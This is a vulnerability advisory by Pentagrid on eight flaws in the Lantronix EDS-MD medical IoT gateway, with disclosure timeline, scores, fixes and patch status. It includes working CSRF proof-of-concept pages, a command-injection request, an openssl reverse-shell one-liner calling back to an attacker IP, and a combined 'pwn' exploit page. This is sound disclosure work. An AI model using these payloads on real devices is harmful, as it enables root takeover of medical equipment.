Multiple vulnerabilities in Lantronix EDS-MD IoT gateway for medical devices
Pentagrid identified several vulnerabilities in Lantronix's EDS-MD product during a penetration test. The EDS-MD is an IoT gateway for medical devices and equipment. The vulnerabilities include an authenticated command injection, cross-site request forgery, missing authentication for the AES-encrypted communication, cross-site scripting vulnerabilities, outdated software components, and more.
The EDS-MD product is an embedded device, more specifically according to the Lantronix website of the EDS-MD:
A wired IoT gateway for mission critical medical devices and equipment connectivity. Key features: - UL and IEC-60601 compliance provides galvanic port isolation to protect connected medical devices - Securely connect any medical device with a serial interface to the network using enterprise-level SSL and SSH - Simple set up and configuration with industry-standard management tools including Web, CLI, XML - Centralized Management via ConsoleFlow™ - Gigabit Ethernet offers increased bandwidth for higher performance - Available with 4, 8 or 16 ports
Timeline
2023-10-09: Vulnerabilities found. No security.txt (RFC 9116) or DNS security TXT found to contact Lantronix. Initial vendor contacted via securitymatters@lantronix.com as found on the Security Updates page of Lantronix.
2023-10-10: Lantronix responds to initial contact. Pentagrid sends detailed advisory.
2023-10-12: Pentagrid asks for advisory receipt confirmation.
2023-10-13: Lantronix confirms receiving the advisory details.
2023-11-13: Pentagrid asks for status update.
2023-11-15: Lantronix responds they reviewed our report and are discussing internally on the next steps. They will send an update in the next couple of days.
2023-11-22: Lantronix responds they plan to fix all issues in the January 12, 2024 release, except the vulnerable old components used, as they regard the product as a legacy product based on a processor that has been EOL by the vendor (planned to be superseded in Q1/Q2 2024 with next generation product).
2023-11-29: Lantronix asks for details about the AES-encrypted connection vulnerability.
2023-12-04: Pentagrid responds that while the device might use TLS for the administrative web interface, the data forwarding for incoming serial bus communication (business logic) of the device was only using the mentioned unauthenticated AES cipher mode.
2023-01-05: Pentagrid asks for a mapping of individual fixes to firmware versions.
2024-01-08: Public disclosure.
2024-01-08: Lantronix changes the release plan and writes the next release is planned for January 31, 2024 and only the three issues "Clickjacking", "Missing authentication on AES-encrypted connection", "Authenticated Stored Cross-Site Scripting (XSS) via File-Download" will be fixed (additional to the two fixed in 8.5.0.0R1).
2024-02-02: Pentagrid asked Lantronix for a status, because the website was not updated and showed version 8.5.0.0R1 from November as latest release.
2024-02-05: Lantronix response that the new release will be labeled as version 8.6.0.0 and will be available by the end of this week.
2024-02-07: Lantronix releases version 8.6.0.0R2.
2024-02-08: Pentagrid asks if there are fixes planned for the two remaining issues "Cross-Site Request Forgery" and "Missing Lantronix Content Security Policy".
2024-02-11: Lantronix responds that they are investigating, but given that it is an old legacy product (that will be superseded by another product coming in Q2 2024), the outlook to fix these two issues is not promising/feasible.
Affected Components
Lantronix's EDS-MD product with the firmware 8.4.0.0R1 is affected. While the webpage specifies that a login is necessary to download the firmware, it can be found on Lantronix's Confluence page.
1. Cross-Site Request Forgery
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, 8.8 High
Summary
The web interface of the Lantronix box is not protected against Cross-Site Request Forgery attacks. No CVE has been assigned to this vulnerability yet.
Impact
If the preconditons are met, the attacker could indirectly do all actions that are available on the Lantronix IoT gateway such as enabling SSH/Telnet, changing the password, disabling authentication, uploading files or exploit the command injection vulnerability documented in this advisory to execute unrestricted commands as root
on the Linux operating system.
Technical details
An attacker could host the following HTML code on his website.
<html> <body> The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner. <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.183.43\/fs", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryoD0vrnoSvVP2UbaB"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" + "Content-Disposition: form-data; name=\"cwd\"\r\n" + "\r\n" + "/\r\n" + "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" + "Content-Disposition: form-data; name=\"selectedfile\"; filename=\"test.txt\"\r\n" + "Content-Type: text/plain\r\n" + "\r\n" + "fooo\r\n" + "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" + "Content-Disposition: form-data; name=\"iehack\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryoD0vrnoSvVP2UbaB\r\n" + "Content-Disposition: form-data; name=\"submit\"\r\n" + "\r\n" + "Upload\r\n" + "------WebKitFormBoundaryoD0vrnoSvVP2UbaB--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); </script> </body> </html>
After an administrator who is currently logged-in on the Lantronix box on 192.168.183.43 (example IP address) visits the attacker's website, a new file was uploaded called test.txt
.
Another example is the following code, which changes the administrator's password to "bbb" and enables SSH and Telnet:
<html> <body> The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner. <form action="http://192.168.183.43/" method="POST"> <input type="hidden" name="ajax" value="CliConfigPost" /> <input type="hidden" name="new_Cli.Login_Password" value="bbb" /> <input type="hidden" name="new_Cli.Enable_Level_Password" value="" /> <input type="hidden" name="new_Cli.Quit_Connect_Line" value="<control>L" /> <input type="hidden" name="new_Cli.Inactivity_Timeout" value="15" /> <input type="hidden" name="new_Cli.Line_Authentication" value="Enabled" /> <input type="hidden" name="new_CliTelnet.State" value="Enabled" /> <input type="hidden" name="new_CliTelnet.Port" value="23" /> <input type="hidden" name="new_CliTelnet.Max_Sessions" value="3" /> <input type="hidden" name="new_CliTelnet.Authentication" value="Disabled" /> <input type="hidden" name="new_CliSsh.State" value="Enabled" /> <input type="hidden" name="new_CliSsh.Port" value="22" /> <input type="hidden" name="new_CliSsh.Max_Sessions" value="3" /> <input type="hidden" name="confirms" value="" /> <input type="hidden" name="submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>
The exploit works as Lantronix use browser-supplied authentication (no authentication, basic authentication or digest authentication). The browser will add the required authentication information to every request.
While this kind of attack used to work with cookie-based authentication, modern browsers protect cookies with the SameSite
flag by default, making Cross-Site Request Forgery impossible in many cases. However, Lantronix does not use cookie-based authentication.
Precondition
Cross-Site Request Forgery have multiple preconditions. An attacker has to know the IP address or DNS name of the Lantronix box he would like to attack. Additionally, an administrator who is currently logged-in at the Lantronix box has to visit the attacker's website, where the prepared HTML/JavaScript code is hosted. However, as the request is not visible to the attacked user, an attacker could send such requests to entire ranges of IP addresses. An attacker also needs to implement its own pingback when a successful exploitation happens, as the Same-Origin-Policy prevents reading if an attack succeeded from the attacker's origin.
Recommendation
It is recommended for Lantronix to:
Include a non-predictable Cross-Site Request Forgery token in every POST request (state changing requests) on the Lantronix IoT gateway and validate the token before accepting the request.
As the Lantronix web server is stateless (no sessions), an alternative mechanism that proofs the non-cross-site-origin could be used. For example, the "Naive Double Submit Cookie" approach could be used. In this scenario, all requests are preprocessed in browser-side JavaScript and sending a non-predictable token (e.g. newly generated long random token) in the POST data and the same token in an HTTP cookie. The web server verifies for all POST requests, that the value in the HTTP cookie header and the POST data matches and otherwise reject the request. As cross-origin requests are not allowed to set arbitrary HTTP cookies for the target domain, such a mechanism proofs the same-origin.
Please note, as Lantronix uses basic or digest browser-based authentication (and not cookie based), the modern prevention mechanism of SameSite
cookies flags do not apply, but the flag could be set in the "Naive Double Submit Cookie" approach.
2. Vulnerable old components used in Lantronix software
CVSS:3.1, 0.0 Information
Summary
The Lantronix IoT gateway uses outdated software with known vulnerabilities.
Impact
The various vulnerabilities have different impacts that have not been analysed in-depth, but it is estimated that there are vulnerabilities that have an impact.
Technical details
The latest release of the gateway OS for the Lantronix IoT gateway at the time of testing was version 8.4.0.0R1 and can be downloaded on the Lantronix Confluence page.
The firmware was released in 2022. However, the firmware (Linux OS) includes various different software pieces that are much older, for example:
BusyBox v1.16.1
CLIENT libcurl 7.36.0
EXT2FS Library version 1.41.11
GNU C Library (Sourcery G++ Lite 2009q1-203) stable release version 2.8
GNU sed version 4.0
Linux-2.6.31
Modern traceroute for Linux, version 2.0.18
OpenSSL 1.0.2i
SERVER: UPnP/1.1 MiniUPnPd/1.9
dnsmasq-2.70
dosfsck 3.0.3
ethtool version 6
iperf version 2.0.5
libcurl/7.36.0
libpcap version 1.0.0
libpcre.so.0.0.1
lspci version 3.1.7
ltrace version 0.5.
nginx version: nginx/1.6.1
setpci version 3.1.7
udhcp 1.16.1
vsftpd: version 2.0.7
For example, OpenSSL 1.0.2 is out of support since 1st January 2020 and is no longer receiving updates.
As another example, the firmware uses the webserver nginx in version 1.6.1 which was released in August 2014. This version of nginx is vulnerable to the following issues:
CVE-2014-3616
CVE-2016-0747
CVE-2016-0746
CVE-2016-0742
CVE-2016-4450
CVE-2017-7529
CVE-2018-16845
CVE-2021-23017
CVE-2022-41742
CVE-2022-41741
The Linux kernel was released 14 years ago in 2009 and has many vulnerabilities published.
As there is no point in searching further for vulnerabilities in a manual way, the EMBA firmware analyser was used and printed the following summary:
[+] Identified 1779 CVE entries. Identified 547 High rated CVE entries / Exploits: 194 Identified 1051 Medium rated CVE entries / Exploits: 177 Identified 181 Low rated CVE entries /Exploits: 25 396 possible exploits available (13 Metasploit modules). Remote exploits: 4 / Local exploits: 35 / DoS exploits: 14 / Github PoCs: 307 / Known exploited vulnerabilities: 6 / Verified Exploits: 0
Pentagrid did not confirm if any of the issues are exploitable on the Lantronix IoT gateway.
Precondition
One of the vulnerabilities has to be exploitable to have an impact on the security of the Lantronix IoT gateway.
Recommendation
It is recommended for Lantronix to:
Update components of the firmware on a regular basis and keep the latest firmware release up to date.
3. Authenticated Command Injection
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L, 8.2 High
Summary
A user who has access to the Lantronix web interface can execute arbitrary commands as root
on the underlying Linux machine. No CVE has been assigned to this vulnerability yet.
Impact
Users on the web interface can circumvent the Lantronix enable command and the restricted shell access to gain full root command execution on the underlying Linux machine. It allows full access to all binaries and therefore simplifies reverse engineering how Lantronix operates the device or to find other security issues. For example, the user's password can be found in cleartext in a file called /ltrx_private/cfg/hidden.config
on the internal filesystem.
Technical details
The functionality to generate new TLS certificate is prone to command injection:
POST / HTTP/1.1 Host: 192.168.183.43 Content-Length: 174 Authorization: Basic REDACTED User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://192.168.183.43 Referer: http://192.168.183.43/?x=k8pgpswk Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close ajax=SslGenerateCertificate&c=ch&s=bb&l=bb&o=bb&ou=bb&cn=bbbbbbb'||ping -c 1 192.168.183.11 #&expires=01%2F01%2F2026&keytype=DSA&bits=512&submit=Submit&sslcredentialname=abbb
The IP address 192.168.183.11 will then receive ICMP requests (pings), meaning the ping
command was executed on the device.
By using the openssl
command that is on the device and used to create a certificate, we can achieve a remote shell to fully access the Lantronix device as Linux user root
:
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.183.11:4444 > /tmp/s; rm /tmp/s
Or as an HTTP request:
POST / HTTP/1.1 Host: 192.168.183.43 Content-Length: 493 Authorization: Basic REDACTED User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: */* Origin: http://192.168.183.43 Referer: http://192.168.183.43/?x=k8pgpswk Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close ajax=SslGenerateCertificate&c=ch&s=bb&l=bb&o=bb&ou=bb&cn=bbbbbbb'|| %6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%73%3b%20%2f%62%69%6e%2f%73%68%20%2d%69%20%3c%20%2f%74%6d%70%2f%73%20%32%3e%26%31%20%7c%20%6f%70%65%6e%73%73%6c%20%73%5f%63%6c%69%65%6e%74%20%2d%71%75%69%65%74%20%2d%63%6f%6e%6e%65%63%74%20%31%39%32%2e%31%36%38%2e%31%38%33%2e%31%31%3a%34%34%34%34%20%3e%20%2f%74%6d%70%2f%73%3b%20%72%6d%20%2f%74%6d%70%2f%73 #&expires=01%2F01%2F2026&keytype=DSA&bits=512&submit=Submit&sslcredentialname=abbb
On the attacker side we just have to listen for the back-connect and then get an interactive shell:
attacker% ncat --ssl -vv -l -p 4444 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: C86D 6F63 B9C0 9050 9A51 A7F3 D8F9 748D 22F4 F497 Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.183.43. Ncat: Connection from 192.168.183.43:34902. /bin/sh: can't access tty; job control turned off / # ls bin boot config defaults dev etc home http lib linuxrc lost+found ltrx_private ltrx_user mnt opt proc root sbin sys tmp usr var / # whoami root / # pwd /
From this perspective we can see how the injection took place as the subprocess is still running (the HTTP request never returned a response):
/ # ps waux PID USER COMMAND 1 root init 2 root [kthreadd] [...] 580 root /sbin/getty -L ttyS0 115200 vt100 604 root /bin/sh /etc/init.d/S71ntpd start 631 root /bin/fwupgrade -c -l -r -s -w -f /tmp/firmware.rom -b E6 647 root /usr/sbin/inetd -f /etc/inetd.conf 658 root /bin/emaild 659 root /bin/alarmd 715 root nginx: master process nginx -c /etc/nginx.conf [...] 727 root /bin/pw_fuse_fs /ltrx_user/pwxcr -o allow_other 1043 root udhcpc --interface=eth0 -t 5 -A 10 -S -s /usr/share/udhcpc/ltrx-dhcp.script -p /var/run/udhcpc.eth0.pid -i eth0 1063 default avahi-autoipd: [eth0] sleeping 1064 root avahi-autoipd: [eth0] callout dispatcher 4635 root sh -c openssl req -x509 -nodes -days 20448 -subj '/C=ch/ST=bb/L=bb/O=bb/OU=bb/CN=bbbbbbb'|| mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.183.11:4444 > /tmp/s; rm /tmp/s #' -set_serial 2 -newkey dsa:/tmp/ssl_dsaparams_12431_12451 -keyout /tmp/ssl_12431_12451.key -out /tmp/ssl_12431_12451 4656 root /bin/sh -i 4657 root openssl s_client -quiet -connect 192.168.183.11 4444 5573 root /bin/sh /etc/init.d/S71ntpd start 5577 root /usr/sbin/ntpd -p 0.pool.ntp.org 5578 root ps waux 12431 root /bin/ltrx_evo 29657 root /sbin/syslogd -L -n -l 7 -m 0 -C512 -O /ltrx_user/log.txt -s 500 -b 0 29658 root /sbin/klogd -n -c 1
This also leads to the conclusion that the web server is running as root
like all other processes.
The following proof of concept HTML code can be used to demonstrate this issue and the Cross-Site Request Forgery (see finding 1) combined:
<html> <body> This is a Proof of Concept exploit for two vulnerabilities in Lantronix EDS-MD: A generic Cross-Site Request Forgery combined with an authenticated command injection. The author of this code is not responsible for any damage caused by the use or misuse of this PoC exploit. This PoCs is intended for educational and research purposes only, and should never be used to target or exploit systems without explicit permission from the owner.<br> Steps to pwn:<br> 1) Log into Lantronix in this browser in another tab<br> 2) Enter the URL of the Lantronix box as a target below<br> 3) Start reverse shell on your computer with "ncat --ssl -vv -l -p 4444" (ncat is part of <a href="https://nmap.org/ncat/">nmap</a>)<br> 4) Enter your reserve shell IP below<br> 5) Press the submit button<br> Reverse shell IP (your IP): <input type="text" name="target" id="reverseip" value="192.168.1.99"><br> Target Lantronix box: <input type="text" name="target" id="target" value="http://192.168.1.98/"><br> <form action="http://192.168.1.12/" method="POST"> <input type="hidden" name="ajax" value="SslGenerateCertificate" /> <input type="hidden" name="c" value="ch" /> <input type="hidden" name="s" value="bb" /> <input type="hidden" name="l" value="bb" /> <input type="hidden" name="o" value="bb" /> <input type="hidden" name="ou" value="bb" /> <input type="hidden" name="cn" id="payload" value="bbbbbbb'|| mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.88:4444 > /tmp/s; rm /tmp/s #" /> <input type="hidden" name="expires" value="01/01/2026" /> <input type="hidden" name="keytype" value="DSA" /> <input type="hidden" name="bits" value="512" /> <input type="hidden" name="sslcredentialname" value="abbb" /> <input type="submit" value="pwn" style="display:none" /> </form> <form> <input type="submit" value="pwn" /> </form> <script> document.forms[1].addEventListener("submit", (e) => { e.preventDefault(); document.forms[0].action = document.getElementById('target').value; var payload = document.getElementById('payload'); payload.value = payload.value.replace('192.168.1.88', document.getElementById('reverseip').value); //console.log("payload: " + document.getElementById('payload').value); //console.log("action: " + document.forms[0].action); document.forms[0].submit(); }); </script> </body> </html>
Precondition
An attacker needs access to the administrative web interface.
While this is unlikely if authentication is enabled, this issue simplifies the exploitation of the Cross-Site Request Forgery issue (see finding 1), by gaining command execution on the Lantronix box via Cross-Site Request Forgery. In this case the preconditions of the Cross-Site Request Forgery apply instead.
Recommendation
It is recommended for Lantronix to:
Avoid passing arguments to a shell or not use any shell execution at all.
To filter user input according to an allowed-characters approach.
To escape shell arguments correctly.
4. Missing authentication on AES-encrypted connection
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N, 5.9 Medium
Summary
As the Lantronix IoT gateway only uses an AES CFB encryption without authentication, an attacker can manipulate data without being detected. No CVE has been assigned to this vulnerability yet.
Impact
An attacker can feed manipulated data into the receiving machine.
Technical details
No TLS is used between the Lantronix IoT gateway and the receiving end, but only AES CFB encryption.
An attacker can flip a bit in the cleartext by flipping the same bit in the ciphertext. In general, this allows arbitrary modification of the sent data.
Usually, applications will send and parse certain messages and therefore the application is coded to parse single messages. However, the underlying AES encryption will use blocks. A message might consist of several blocks.
A side effect is that the next AES block (128 bit = 16 bytes) will be randomly changed (the changes are unpredictable to the attacker as he does not know the secret key). This problem can be solved by the attacker by only modifying the last block of a message (and therefore the start of the next message would be corrupt) or by finding a place in a message, where a random corruption of the next AES block does not matter.
Precondition
An attacker has to be in a Machine-In-The-Middle (MITM) position to conduct the attack. The attacker would need to know the length of messages and locations of where a bit flip should happen. Additionally, an attacker has to correlate AES cipher blocks with application messages, so that the last block of a message is attacked or somewhere where the next block can be corrupted.
Recommendation
It is recommended for Lantronix to:
Check if a new version of TLS or TLS-PSK could be offered to customers, which offers a full solution with many security aspects covered.
5. HTTP digest authentication prevents logout
CVSS:3.1, 0.0 Information
Summary
The used authentication mechanism on the Lantronix administrative web interface has disadvantages such as no working logout mechanism.
Impact
Attackers are more likely to find an authenticated browser on a compromised machine, as a logout from the Lantronix web interface is only possible by closing the browser completely.
Technical details
The Lantronix IoT gateway can use HTTP basic, digest or no authentication. HTTP digest and basic authentication is handled by the browser and there is usually no logout possible (except for closing the browser).
HTTP digest authentication is only providing little benefit over HTTP basic authentication. The much more important factor is the usage of TLS on the web interface in any case. HTTP digest authentication is weak as it uses MD5, which is a password hashing algorithm where very fast password cracking approaches are available and therefore the strength of the password has to be very high.
Precondition
An attacker first has to compromise a machine where a login to the Lantronix web interface took place or be in a MITM position to exploit the issue.
Recommendation
It is recommended for Lantronix to:
Provide a stronger authentication method on the web interface.
6. Clickjacking
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N, 4.7 Medium
Summary
The website is not protected against Clickjacking.
Impact
An attacker could load the Lantronix web interface in an iframe and make the iframe invisible, forwarding clicks by the user to the Lantronix web interface and therefore manipulate the user into taking undesired actions on the Lantronix IoT gateway's web interface.
Technical details
The Lantronix web interface does not set the X-Frame-Options
or Content-Security-Policy
header that would prevent clickjacking.
An attacker-controlled website can load the Lantronix website in an iframe.
Precondition
An attacker has to lure a victim who is already logged-in on the Lantronix IoT gateway onto an attacker controlled-website. The attacker has to know the URL/IP of the Lantronix web interface for the attack.
Recommendation
It is recommended for Lantronix to:
Set the HTTP header
Content-Security-Policy
and prevent framing or use theX-Frame-Options
header.
7. Authenticated Stored Cross-Site Scripting (XSS) via File-Download
CVSS:3.1, 0.0 Information
Summary
The file download of the Lantronix web interface is affected by a Cross-Site Scripting issue.
Impact
An attacker can mainly attack other users of the web interface, as the attacked user has to be able to download a file on the web interface. No CVE has been assigned to this vulnerability yet.
Technical details
The Lantronix web interface does not set the Content-Disposition
header, which would instruct the browser to download the file rather than to interpret it in the browser. The Content-Type
header is missing as well, forcing the browser to guess the Content-Type
of every downloaded file:
GET /fs?file=%2Ftest.html HTTP/1.1 Host: 192.168.183.43 Cache-Control: max-age=0 Authorization: Basic REDACTED Upgrade-Insecure-Requests: 1 Origin: http://192.168.183.43 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9 Connection: close Accept: */* HTTP/1.1 200 Ok Server: Lantronix Web Manager Date: Thu, 07 Sep 2023 12:01:41 GMT Content-Length: 65 Connection: close <html><head></head><body>this is just a little html</body></html>
Therefore, the browser will interpret HTML files as HTML. This means an attacker who can convince another user on the Lantronix web interface to download a file could execute arbitrary JavaScript in the context of that user.
Precondition
An attacker would need to attack a user who is already logged-in and at the same time the attacker has to be able to upload files to the Lantronix device. This precondition under normal circumstances is unlikely.
However, by combining this issue with the Cross-Site Request Forgery issue (see finding 1), an attacker could more easily construct a working exploit. In this case the preconditions of the Cross-Site Request Forgery apply instead.
Recommendation
It is recommended for Lantronix to:
Set the HTTP response header
Content-Disposition: attachment
in the response and therefore instruct the browser to download the file instead of previewing it.Set a correct
Content-Type
HTTP response header.Prevent upload of file extensions that could lead to XSS.
8. Missing Content Security Policy
CVSS:3.1, 0.0 Information
Summary
There is no policy for the Cross-site Scripting (XSS) prevention feature Content Security Policy (CSP).
Impact
The policy could prevent XSS if an XSS occurs on the website.
Technical details
No Content Security Policy is set by the Lantronix administrative web interface.
Precondition
An attacker needs to find a XSS issue first to be able to exploit the issue that the CSP is missing.
Recommendation
It is recommended for Lantronix to:
change the website to not require inline JavaScript or to use a nonce or hash-based approach that also allows to remove the unsafe-inline keyword. Afterwards a strong CSP can be put in place.
Patches and Workaround
Firmware version 8.5.0.0R1 released on 17 November 2023 includes the following information regarding fixes in the release notes:
LEG-447 Authenticated Command Injection
LEG-442 HTTP digest authentication prevents logout
Lantronix released a firmware update on February 07, 2024 that fixes:
Clickjacking
Missing authentication on AES-encrypted connection
Authenticated Stored Cross-Site Scripting (XSS) via File-Download
There is currently no plan to fix:
Cross-Site Request Forgery
Missing Content Security Policy
Vulnerable old components used in Lantronix software